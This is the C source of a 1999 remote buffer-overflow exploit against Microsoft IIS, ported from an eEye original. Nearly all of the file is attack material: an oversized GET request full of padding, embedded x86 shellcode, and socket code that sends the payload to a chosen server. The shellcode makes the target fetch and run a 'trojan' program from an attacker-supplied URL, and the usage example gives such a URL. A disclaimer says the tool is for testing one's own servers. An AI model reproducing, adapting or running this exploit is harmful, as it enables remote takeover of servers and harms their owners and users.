/***********************************************************/
/* IIS Exploit for Linux (c) 1999 Ultima             [2000]*/
/*                 ultima@snicker.emoti.com          [2000]*/
/* The original exploit as published by EEye was written   */
/* in assembler, and is rather unportable. I wrote it in   */
/* C, and it should compile and run on just about anything.*/
/*                                                   [2000]*/
/* THIS IS ONLY FOR TESTING YOUR OWN SERVERS FOR THE [2000]*/
/* VULNERABILITY. BY RUNNING THIS PROGRAM YOU ASSUME [2000]*/
/* ALL LIABILITY FOR ANY AND ALL RESULTS CAUSED BY   [2000]*/
/* THIS PROGRAM, WHETHER DIRECT OR INDIRECT. IN NO CASE    */
/* SHALL ULTIMA BE HELD RESPONSIBLE.                 [2000]*/
/*                                                   [2000]*/
/* Released: 6.16.1999 (Y2K Compliant!! =)           [2000]*/
/*                                                   [2000]*/
/* This code is released under the terms of the LGPL [2000]*/
/* Version 2 or later, at your discretion.           [2000]*/
/*                                                   [2000]*/
/* The uninitialized egg was evolved from reverse-   [2000]*/
/* engineering the EEye exploit, and was injected into     */
/* C. This is basically the same poison, with a different  */
/* needle. Thanks to drkspyrit and the EEyes ppl,without   */
/* which, this code would have not existed.          [2000]*/
/* He can be reached as barns@eeye.com.              [2000]*/
/* The eEye website is http://www.eEye.com           [2000]*/
/* Usage: ./iishack <server> <port> <trojan>         [2000]*/
/* The trojan is an http url (minus the http://) of a[2000]*/
/* program you want to run on the server. Server and port  */
/* are self-explanitory.                             [2000]*/
/* Compiling: cc -o iishack iishack.c                [2000]*/
/* Example:                                          [2000]*/
/* ./iishack www.notthere.com 80 www.myisp.com/exploit.exe */
/***********************************************************/

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdlib.h>
#include <arpa/inet.h>

#define egglen 1157
#define urloff 1055

unsigned char egg[] = {
  71,  69,  84,  32,  47,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,
  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,
  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,
  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,
  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,
  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,
  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,
  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,
  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,
  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,
  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,
  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,
  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,
  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,
  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,
  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,
  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,
  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,
  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,
  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,
  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,
  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,
  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,
  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,
  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,
  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,
  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,
  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,
  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,
  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,
  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,
  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,
  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,
  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,
  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,
  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,
  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,  65,
  65,  65,  65, 176, 135, 103, 104, 176, 135, 103, 104, 144, 144, 144, 144,  88,
  88, 144,  51, 192,  80,  91,  83,  89, 139, 222, 102, 184,  33,   2,   3, 216,
  50, 192, 215,  44,  33, 136,   3,  75,  60, 222, 117, 244,  67,  67, 186, 208,
  16, 103, 104,  82,  81,  83, 255,  18, 139, 240, 139, 249, 252,  89, 177,   6,
  144,  90,  67,  50, 192, 215,  80,  88, 132, 192,  80,  88, 117, 244,  67,  82,
  81,  83,  86, 178,  84, 255,  18, 171,  89,  90, 226, 230,  67,  50, 192, 215,
  80,  88, 132, 192,  80,  88, 117, 244,  67,  82,  83, 255,  18, 139, 240,  90,
  51, 201,  80,  88, 177,   5,  67,  50, 192, 215,  80,  88, 132, 192,  80,  88,
  117, 244,  67,  82,  81,  83,  86, 178,  84, 255,  18, 171,  89,  90, 226, 230,
  51, 192,  80,  64,  80,  64,  80, 255,  87, 244, 137,  71, 204,  51, 192,  80,
  80, 176,   2, 102, 171,  88, 180,  80, 102, 171,  88, 171, 171, 171, 177,  33,
  144, 102, 131, 195,  22, 139, 243,  67,  50, 192, 215,  58, 200, 117, 248,  50,
  192, 136,   3,  86, 255,  87, 236, 144, 102, 131, 239,  16, 146, 139,  82,  12,
  139,  18, 139,  18, 146, 139, 215, 137,  66,   4,  82, 106,  16,  82, 255, 119,
  204, 255,  87, 248,  90, 102, 131, 238,   8,  86,  67, 139, 243, 252, 172, 132,
  192, 117, 251,  65,  78, 199,   6, 141, 138, 141, 138, 129,  54, 128, 128, 128,
  128,  51, 192,  80,  80, 106,  72,  83, 255, 119, 204, 255,  87, 240,  88,  91,
  139, 208, 102, 184, 255,  15,  80,  82,  80,  82, 255,  87, 232, 139, 240,  88,
  144, 144, 144, 144,  80,  83, 255,  87, 212, 139, 232,  51, 192,  90,  82,  80,
  82,  86, 255, 119, 204, 255,  87, 236, 128, 252, 255, 116,  15,  80,  86,  85,
  255,  87, 216, 128, 252, 255, 116,   4, 133, 192, 117, 223,  85, 255,  87, 220,
  51, 192,  64,  80,  83, 255,  87, 228, 144, 144, 144, 144, 255, 108, 102, 115,
  111, 102, 109,  84,  83,  33, 128, 141, 132, 147, 134, 130, 149,  33, 128, 141,
  152, 147, 138, 149, 134,  33, 128, 141, 132, 141, 144, 148, 134,  33, 128, 141,
  144, 145, 134, 143,  33, 120, 138, 143, 102, 153, 134, 132,  33, 104, 141, 144,
  131, 130, 141,  98, 141, 141, 144, 132,  33, 120, 116, 112, 100, 108,  84,  83,
  33, 147, 134, 132, 151,  33, 148, 134, 143, 133,  33, 148, 144, 132, 140, 134,
  149,  33, 132, 144, 143, 143, 134, 132, 149,  33, 136, 134, 149, 137, 144, 148,
  149, 131, 154, 143, 130, 142, 134,  33, 144, 152, 143,  79, 134, 153, 134,  33,
  33,  33,  33,  33,  33,  33,  33,  33,  33,  33,  33,  33,  33,  33,  33,  33,
  33,  33,  33,  33,  33,  33,  33,  33,  33,  33,  33,  33,  33,  33,  33,  33,
  33,  33,  33,  33,  33,  33,  33,  33,  33,  33,  33,  33,  33,  33,  33,  33,
  33,  33,  33,  33,  33,  33,  33,  33,  33,  33,  33,  33,  33,  33,  33,  33,
  33,  33,  33,  33,  33,  33,  33,  33,  33,  33,  33,  33,  33,  33,  33,  33,
  33,  33,  33,  33,  33,  46, 104, 116, 114,  32,  72,  84,  84,  80,  47,  49,
  46,  48,  13,  10,  13,  10,  10 };

u_int32_t resolve(char *host)
{
  struct hostent *he;
  long n = inet_addr(host);
  if(n!=-1)
    return(n);
  he = gethostbyname(host);
  if(!he)
    {
      herror("gethostbyname");
      return(0);
    }
  memcpy(&n, he->h_addr, 4);
  return(*(long *)he->h_addr_list[0]);
}

int main(int argc, char **argv)
{
  char *server;
  int port;
  char *url;
  int fd;
  struct sockaddr_in s_in;
  int i=0,x,j=0;
  int first=0;
  if(argc != 4)
    {
      fprintf(stderr, "usage: %s <server> <port> <trojan>\n", argv[0]);
      exit(1);
    }
  server = argv[1];
  port = atoi(argv[2]);
  url = argv[3];
  if(strlen(url) > 85)
    {
      fprintf(stderr, "Trojan name must be less than 85 characters.\n");
      exit(1);
    }
  for(x=0;x<strlen(url);x++)
    {
      if(url[x] == '/' && !first)
        {
          first=1;
          egg[urloff+j]='!'+0x21;
          egg[urloff+j+1]='G'+0x21;
          egg[urloff+j+2]='E'+0x21;
          egg[urloff+j+3]='T'+0x21;
          egg[urloff+j+4]=' '+0x21;
          egg[urloff+j+5]='/'+0x21;
          j+=6;
          continue;
        }
      egg[urloff+j] += url[x];
      j++;
    }
  fd = socket(AF_INET, SOCK_STREAM, 0);
  s_in.sin_family = AF_INET;
  s_in.sin_port = htons(port);
  s_in.sin_addr.s_addr = resolve(server);
  connect(fd, (struct sockaddr *)&s_in, sizeof(struct sockaddr_in));
  while(i!=egglen)
    {
      x=send(fd, egg+i, egglen-i, 0);
      if(x<0)
        {
          fprintf(stderr, "Connection to target lost. WTF?\n");
          exit(1);
        }
      i+=x;
    }
  printf("Trojan uploaded successfully (I think...)\n");
  return(0);
}
/*                    www.hack.co.za              [2000]*/